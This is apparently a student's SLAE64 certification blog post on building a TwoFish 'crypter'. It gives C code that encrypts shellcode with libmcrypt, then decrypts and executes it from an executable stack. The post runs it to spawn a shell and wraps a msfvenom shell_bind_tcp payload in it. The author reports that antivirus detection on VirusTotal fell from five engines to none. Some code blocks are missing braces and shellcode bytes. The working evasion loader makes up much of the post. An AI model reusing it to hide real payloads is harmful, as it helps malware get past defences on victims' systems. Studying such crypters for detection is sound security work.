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Assignment #7: Custom Crypter


This assignment requires to create a crypter using any existing encryption schema. It can be done in the progrmaming language desireed.

The cypher that’s going to be implemented is the TwoFish Cypher. More information on the algorythm for TwoFish can be found at Bruce Schneier blog.

The original shellcode to crypt is the generated from Execve-Stack.nasm. This shellcode will be crypted using the code in the TwoFish_Crypter.c file, and the crypted code, will be decrypted and then executed in the TwoFish_Decrypter.c file.

To implement the TwoFish, the libmcrypt library is used. Documentation and examples on how to use libmcrypt can be found here. In Debian Buster GNU/Linux, is required to install the develop libraries for libmcrypt.

Implementation Using libmcrypt

To work with TwoFish, libmcrypt requires the following inputs:

The password and IV that’s used to encrypt, needs to be the same ones for the decrypt process. And the shellcode string will be in hex format.

Steps to follow for using libmcrypt in a C Programm are:

  1. Initialize libmcrypt to work with TwoFish in CFB mode. This is done with the mcrypt_module_open function, that returns a MCRYPT object that is saved as id_crypt
MCRYPT id_crypt;
id_crypt = mcrypt_module_open("twofish", NULL, "cfb", NULL); 
  1. Generate a random IV of 16 bytes long
int iv_size = mcrypt_enc_get_iv_size(id_crypt);   // Will return 16 bytes

for (int i = 0; i < iv_size; i++) {               // For each byte of the IV
    IV[i] = (unsigned char)rand();                // It is ramdomly generated
  1. Initialize the crypt (or decrypt) process for libmcrypt for the id_crypt with the right password and generated IV
mcrypt_generic_init(id_crypt, password, iv_size, IV); 
  1. Encrypt or decrypt a string (shellcode)
// Crypt
mcrypt_generic(id_crypt, code, code_length); 
// DeCrypt
mdecrypt_generic(id_crypt, code, code_length); 
  1. Close mcrypt id before exiting the programm

For the assignment, two files are created:

Crypt: Twofish_Crypter.c

The code implements explained before to use libmcrypt to crypt the shellcode. During the process, the following information is printed on screen (as it will be required in next steps):

The code initializes the libmcryptlibrary to be used with TwoFish. Then generates the IV randomly using the rand() function after initializing the seed with srand() and time() functions and prints them along with the password in the screen. Then the shellcode is crypted and printed in C and ASM formats.

The full code can be found in the TwoFish_Crypter.c file on the GitHub Repo for this assignment:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#include <mcrypt.h>

// TwoFish needed setups

#define IV_SIZE 16
unsigned char password[] = "12345678";
unsigned char IV[IV_SIZE];

//  ShellCode to Cypher: Execve-Shell-Stack.nasm
unsigned char code[]= \

int main (void)

	MCRYPT id_crypt;
	int code_length = strlen(code);

	/* Initialize the seed for the rand() function to generate IV */

    /* Print the original shellcode and it's size */
	printf("\nOriginal Shellcode to Cypher (%d bytes):\n", code_length);
	for (int i = 0; i < code_length; i++) {
		printf("0x%02x,", code[i]);

	/* MCrypt TwoFish Initialization */
	id_crypt = mcrypt_module_open("twofish", NULL, "cfb", NULL);

	/* IV initialization */
	printf("\n\nTwoFish IV value (C format): ");
	int iv_size = mcrypt_enc_get_iv_size(id_crypt);                  // Will return 16 bytes
	for (int i = 0; i < iv_size; i++) {
		IV[i] = (unsigned char)rand();
		printf("\\x%02x", IV[i]);

	/* Print Password used for crypting */
	printf("\nTwoFish Password Used: %s", password);

	/* Initialize the encryption process with the pass and IV */
	int x = mcrypt_generic_init(id_crypt, password, 16, IV);
	if (x < 0) {		                                             // Error Handling
		printf("\n!! ERROR: %d !!", x);

	/* Encryption of the code[] string */
	x = mcrypt_generic(id_crypt, code, code_length);
	if ( x < 0) {		                                             // Error Handling
		printf("\n!! ERROR: %d !!", x);

	/* Print the crypted shellcode */
	printf("\n\nCrypted Shellcode:\n\n  ASM Format: \n");

		/* First printed in ASM format */
	for (int i = 0; i < code_length-1; i++) {
		printf("0x%02x,", code[i]);

		/* Now printed in C format */
	printf("\n\n  C Format: \n");
	for (int i = 0; i < code_length; i++) {
		printf("\\x%02x", code[i]);

	/* End the mcrypt */


DeCrypt: Twofish_Decrypter.c

This code does exactly the same as before. Just that this time it decrypts the shellcode given.

Decrypt needs the same password and IV used to crypt

The steps are the same as before. The program has the string containing the crypted shellcode in hex format, decrypts with the same password and IV used to crypt, and once this is done, runs the decrypted shellcode using the following code snippet:

	int (*ret)() = (int(*)())code;

The full code can be found in the TwoFish_Decrypter.c file on the GitHub Repo for this assignment:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mcrypt.h>

// TwoFish needed setups

#define IV_SIZE 16
unsigned char password[] = "12345678";
// Same IV as crypt
unsigned char IV[IV_SIZE] = "\x01\x01\x01\x01\x01\x01\x01\x01"

//  ShellCode to decrypt
unsigned char code[]= \

int main (void)
	MCRYPT id_crypt;
	int code_length = strlen(code);

	printf("\nCrypted Shellcode (%d bytes):\n", code_length);
	for (int i = 0; i < code_length-1; i++) {
		printf("0x%02x,", code[i]);
	printf("0x%02x", code[code_length-1]);	                    // Remove last ","

	/* MCrypt TwoFish Initialization */
	id_crypt = mcrypt_module_open("twofish", NULL, "cfb", NULL);

	/* IV initialization */
	printf("\n\nTwoFish IV value: ");
	int iv_size = mcrypt_enc_get_iv_size(id_crypt);
	for (int i = 0; i < iv_size-1; i++) {
		printf("0x%02x,", IV[i]);
	printf("0x%02x", IV[iv_size-1]);	                        // Remove ","

	/* Print Password used for crypting */
	printf("\nTwoFish Password Used: %s", password);

	/* Initialize the encryption process with the pass and IV */
	int x = mcrypt_generic_init(id_crypt, password, 16, IV);
	if (x < 0)		                                            // Error Handling
		printf("\n!! ERROR: %d !!", x);

	/* Encryption of the code[] string */
	x = mdecrypt_generic(id_crypt, code, code_length);
	if ( x < 0)		                                            // Error Handling
		printf("\n!! ERROR: %d !!", x);

	/* Print the decrypted shellcode */
	printf("\n\nDeCrypted Shellcode:\n\n  ASM Format: \n");

		/* First printed in ASM format */
	for (int i = 0; i < code_length-1; i++) {
		printf("0x%02x,", code[i]);
	printf("0x%02x", code[code_length-1]);	                    // Remove ","

		/* Now printed in C format */
	printf("\n\n  C Format: \n");
	for (int i = 0; i < code_length-1; i++) {
		printf("\\x%02x,", code[i]);
	printf("\\x%02x", code[code_length-1]);                     // Remove last ","

	/* End the mcrypt */


	/* Lets run the shellcode */
	int (*ret)() = (int(*)())code;

Run Everything

Let’s try that everything works. Let’s pick the Execve-Stack.nasm, generate it’s shellcode, then Crypt it. The crypted shellcode will be placed in the Decrypt process, and once decrypted, executed.

Generate Execve Stack Shellcode

Just compiling and using objdump the shellcode is generated:

SLAE64> nasm -f elf64 Execve-Stack.nasm -o Execve-Stack.o
SLAE64> echo\"$(objdump -d Execve-Stack.o | grep '[0-9a-f]:' | 
              cut -d$'\t' -f2 | grep -v 'file' | tr -d " \n" | sed 's/../\\x&/g')\"""


Crypt the Shellcode

This shellcode is placed in the code[] string in the TwoFish_Crypter.c file:

unsigned char code[]= \

Compile and run, and we get the following output:

To compile with using libmcrypt, the following flags are needed for gcc: -L/usr/include -lmcrypt. Password used for TwoFish is “12345678”.

SLAE64> gcc -L/usr/include -lmcrypt TwoFish_Crypter.c -o TwoFish_Crypter
SLAE64> ./TwoFish_Crypter 

Original Shellcode to Cypher (32 bytes):

TwoFish IV value (C format): \x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01
TwoFish Password Used: 12345678

Crypted Shellcode:

  ASM Format: 

  C Format: 

Decrypt and Execute the Shellcode

To decrypt, in the file TwoFish_Decrypter.c, is needed to:

unsigned char IV[IV_SIZE] = \

unsigned char code[]= \

To compile, a part of the same flags used for libmcrypt the -fno-stack-protector -z execstack flags are needed too.

Now let’s compile the program as usual:

SLAE64> gcc -L/usr/include -lmcrypt -fno-stack-protector -z execstack TwoFish_Decrypter.c -o TwoFish_Decrypter

And time to execute it. The output generated is:

SLAE64> ./TwoFish_Decrypter 

Crypted Shellcode (32 bytes):

TwoFish IV value: \x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01
TwoFish Password Used: 12345678

DeCrypted Shellcode:

  ASM Format: 

  C Format: 

# w
 11:46:44 up 19 min,  1 user,  load average: 0.01, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty7     :0               11:27   19:35   7.62s  7.62s /usr/lib/xorg/
# exit

All OK

As can be seen, the code worked as expected. The shellcode been crypted, then decrypted and executed and it spawned us a shell.

VirusTotal: Let’s check efectivity?

Came to my mind to test how efective the Crypt would be against detections systems (AV, IPS…). For that, VirusTotal is going to be used to check how much a msfvenom shellcode can be ofuscated.

First, a shell_bind_tcp payload is created with msfvenom:

SLAE64> msfvenom -p linux/x64/shell_bind_tcp RHOST= -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 86 bytes
Final size of c file: 386 bytes
unsigned char buf[] = 

Checking VirusTotal with shellcode.c

This shellcode is placed in the shellcode.c template.

  1. Code is compiled and the executable uploaded to VirusTotal:

  1. VirusTotal analyzes it and the shellcode been detected by a total of 5 engines:

Checking VirusTotal with the TwoFish_Decrypter.c

To see if the encryption used is effective, the same is doing using the Crypt Schema used.

  1. The shellcode is placed in the TwoFish_Crypter.c file. Compiled and executed:

  1. The encrypted shellcode, IV and password are placed in the TwoFish_Decrypter.c and compiled

  1. The executable ./TwoFish_Decrypter is uploaded to VirusTotal

  1. And running the analysis, this time no AV engine detected the shellcode!

GitHub Repo Files

The GitHub Repo for this assignment contains the following files:

The End

This pages have been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: PA-14628